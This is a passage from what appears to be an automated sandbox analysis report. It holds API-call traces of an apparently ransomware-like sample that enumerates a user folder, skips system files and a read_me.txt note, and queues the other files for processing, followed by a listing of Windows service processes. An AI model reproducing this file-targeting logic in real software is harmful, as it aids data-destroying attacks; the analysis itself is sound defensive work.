(HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.357] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.358] GetProcessHeap () returned 0x4f10000 [0084.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.359] GetProcessHeap () returned 0x4f10000 [0084.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.359] GetProcessHeap () returned 0x4f10000 [0084.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.359] SetFilePointerEx (in: hFile=0x980, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.359] WriteFile (in: hFile=0x980, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0084.359] WriteFile (in: hFile=0x980, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0084.359] GetProcessHeap () returned 0x4f10000 [0084.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0084.359] GetProcessHeap () returned 0x4f10000 [0084.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.359] GetProcessHeap () returned 0x4f10000 [0084.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.359] CloseHandle (hObject=0x980) returned 1 [0084.361] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 129 [0084.361] GetProcessHeap () returned 0x4f10000 [0084.362] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e71148 [0084.363] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\*") returned 28 [0084.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x25076e20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25076e20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0084.363] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\.") returned 28 [0084.363] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x25076e20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25076e20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0084.363] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\..") returned 29 [0084.363] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.363] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0084.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0084.363] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0084.363] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0084.363] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0084.363] CloseHandle (hObject=0x97c) returned 1 [0084.363] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0084.363] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0084.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="read_me.txt") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="autoexec.bat") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="desktop.ini") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="autorun.inf") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="iconcache.db") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="bootsect.bak") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="boot.ini") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0084.364] StrStrW (lpFirst="desktop.lnk", lpSrch="thumbs.db") returned 0x0 [0084.364] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 225 [0084.364] QueueUserWorkItem (Function=0x404e00, Context=0x97c, Flags=0x0) returned 1 [0084.364] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0084.364] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0084.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x978 [0084.364] StrStrW (lpFirst="downloads.lnk", lpSrch="read_me.txt") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="autoexec.bat") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="desktop.ini") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="autorun.inf") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="iconcache.db") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="bootsect.bak") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="boot.ini") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0084.365] StrStrW (lpFirst="downloads.lnk", lpSrch="thumbs.db") returned 0x0 [0084.365] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 226 [0084.365] QueueUserWorkItem (Function=0x404e00, Context=0x978, Flags=0x0) returned 1 [0084.365] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25076e20, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x25076e20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25076e20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0084.365] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\read_me.txt") returned 38 [0084.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\read_me.txt" (normalized: "c:\\users\\default\\links\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x974 [0084.365] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0084.365] CloseHandle (hObject=0x974) returned 1 [0084.365] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0084.365] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0084.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x974 [0084.401] StrStrW (lpFirst="recentplaces.lnk", lpSrch="read_me.txt") returned 0x0 [0084.401] StrStrW (lpFirst="recentplaces.lnk", lpSrch="autoexec.bat") returned 0x0 [0084.401] StrStrW (lpFirst="recentplaces.lnk", lpSrch="desktop.ini") returned 0x0 [0084.401] StrStrW (lpFirst="recentplaces.lnk", lpSrch="autorun.inf") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="ntuser.dat") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="iconcache.db") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="bootsect.bak") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="boot.ini") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0084.402] StrStrW (lpFirst="recentplaces.lnk", lpSrch="thumbs.db") returned 0x0 [0084.402] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 227 [0084.402] QueueUserWorkItem (Function=0x404e00, Context=0x974, Flags=0x0) returned 1 [0084.402] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="recentplaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0084.402] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0084.402] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\read_me.txt") returned 38 [0084.402] GetProcessHeap () returned 0x4f10000 [0084.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e71148 | out: hHeap=0x4f10000) returned 1 [0084.402] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 108 [0084.402] GetProcessHeap () returned 0x4f10000 [0084.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 Thread: id = 119 os_tid = 0xb64 Thread: id = 120 os_tid = 0xb68 Thread: id = 121 os_tid = 0xb84 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x980" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 10 os_tid = 0x76c Thread: id = 11 os_tid = 0x758 Thread: id = 12 os_tid = 0x74c Thread: id = 13 os_tid = 0x72c Thread: id = 14 os_tid = 0x71c Thread: id = 15 os_tid = 0x718 Thread: id = 16 os_tid = 0x638 Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x128 Thread: id = 20 os_tid = 0x12c Thread: id = 21 os_tid = 0x120 Thread: id = 22 os_tid = 0x3fc Thread: id = 96 os_tid = 0xa94 Thread: id = 132 os_tid = 0x7b4 Thread: id = 185 os_tid = 0x940 Thread: id = 192 os_tid = 0xac8 Thread: id = 195 os_tid = 0xd0 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x980" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 24 os_tid = 0x5b4 Thread: id = 25 os_tid = 0x798 Thread: id = 26 os_tid = 0x330 Thread: id = 27 os_tid = 0x7f8 Thread: id = 28 os_tid = 0x430 Thread: id = 29 os_tid = 0x268 Thread: id = 30 os_tid = 0x768 Thread: id = 31 os_tid = 0x764 Thread: id = 32 os_tid = 0x760 Thread: id = 33 os_tid = 0x75c Thread: id = 34 os_tid = 0x70c Thread: id = 35 os_tid = 0x6e8 Thread: id = 36 os_tid = 0x6d8 Thread: id = 37 os_tid = 0x6d4 Thread: id = 38 os_tid = 0x6c8 Thread: id = 39 os_tid = 0x6c0 Thread: id = 40 os_tid = 0x6b8 Thread: id = 41 os_tid = 0x6a4 Thread: id = 42 os_tid = 0x6a0 Thread: id = 43 os_tid = 0x690 Thread: id = 44 os_tid = 0x67c Thread: id = 45 os_tid = 0x490 Thread: id = 46 os_tid = 0x454 Thread: id = 47 os_tid = 0x450 Thread: id = 48 os_tid = 0x428 Thread: id = 49 os_tid = 0x424 Thread: id = 50 os_tid = 0x420 Thread: id = 51 os_tid = 0x404 Thread: id = 52 os_tid = 0x18c Thread: id = 53 os_tid = 0xf0 Thread: id = 54 os_tid = 0xc8 Thread: id = 55 os_tid = 0x3f0 Thread: id = 56 os_tid = 0x3e4 Thread: id = 57 os_tid = 0x398 Thread: id = 58 os_tid = 0x394 Thread: id = 59 os_tid = 0x390 Thread: id = 60 os_tid = 0x38c Thread: id = 61 os_tid = 0x378 Thread: id = 62 os_tid = 0x370 Thread: id = 71 os_tid = 0x9bc Thread: id = 72 os_tid = 0x9c0 Thread: id = 97 os_tid = 0xb08 Thread: id = 98 os_tid = 0xb0c Thread: id = 99 os_tid = 0xb10 Thread: id = 100 os_tid = 0xb14 Thread: id = 101 os_tid = 0xb18 Thread: id = 102 os_tid = 0xb1c Thread: id = 103 os_tid = 0xb20 Thread: id = 104 os_tid = 0xb24 Thread: id = 105 os_tid = 0xb28 Thread: id = 106 os_tid = 0xb2c Thread: id = 107 os_tid = 0xb30 Thread: id = 108 os_tid = 0xb34 Thread: id = 109 os_tid = 0xb38 Thread: id = 110 os_tid = 0xb3c Thread: id = 111 os_tid = 0xb40 Thread: id = 112 os_tid = 0xb44 Thread: id = 113 os_tid = 0xb48 Thread: id = 116 os_tid = 0xb54 Thread: id = 117 os_tid = 0xb58 Thread: id = 122 os_tid = 0x888 Thread: id = 123 os_tid = 0x884 Thread: id = 124 os_tid = 0x88c Thread: id = 125 os_tid = 0x880 Thread: id = 126 os_tid = 0x87c Thread: id = 127 os_tid = 0x878 Thread: id = 128 os_tid = 0x874 Thread: id = 129 os_tid = 0x89c Thread: id = 130 os_tid = 0x6b4 Thread: id = 131 os_tid = 0x774 Thread: id = 171 os_tid = 0x914 Thread: id = 172 os_tid = 0x938 Thread: id = 173 os_tid = 0x908 Thread: id = 174 os_tid = 0x958 Thread: id = 175 os_tid = 0x8fc Thread: id = 176 os_tid = 0x8e8 Thread: id = 177 os_tid = 0x904 Thread: id = 178 os_tid = 0x910 Thread: id = 179 os_tid = 0x8f4 Thread: id = 182 os_tid = 0x98c Thread: id = 183 os_tid = 0x954 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x64807000" os_pid = "0x81c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 63 os_tid = 0x83c Thread: id = 64 os_tid = 0x838 Thread: id = 65 os_tid = 0x834 Thread: id = 66 os_tid = 0x830 Thread: id = 67 os_tid = 0x82c Thread: id = 68 os_tid = 0x828 Thread: id = 69 os_tid = 0x824 Thread: id = 70 os_tid = 0x820 Thread: id = 115 os_tid = 0xb50 Thread: id = 187 os_tid = 0x974 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4fc13000" os_pid = "0x9c4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004f8d3" [0xc000000f] Thread: id = 73 os_tid = 0x9c8 Thread: id = 74 os_tid = 0x9cc Thread: id = 75 os_tid = 0x9d0 Thread: id = 76 os_tid = 0x9d4 Thread: id = 77 os_tid = 0x9d8 Thread: id = 78 os_tid = 0x9dc Thread: id = 79 os_tid = 0x9e0 Thread: id = 114 os_tid = 0xb4c Thread: id = 180 os_tid = 0x900 Thread: id = 181 os_tid = 0x8e4 Thread: id = 188 os_tid = 0x968 Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4f171000" os_pid = "0x9e4" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x9c4" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0004fce0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 80 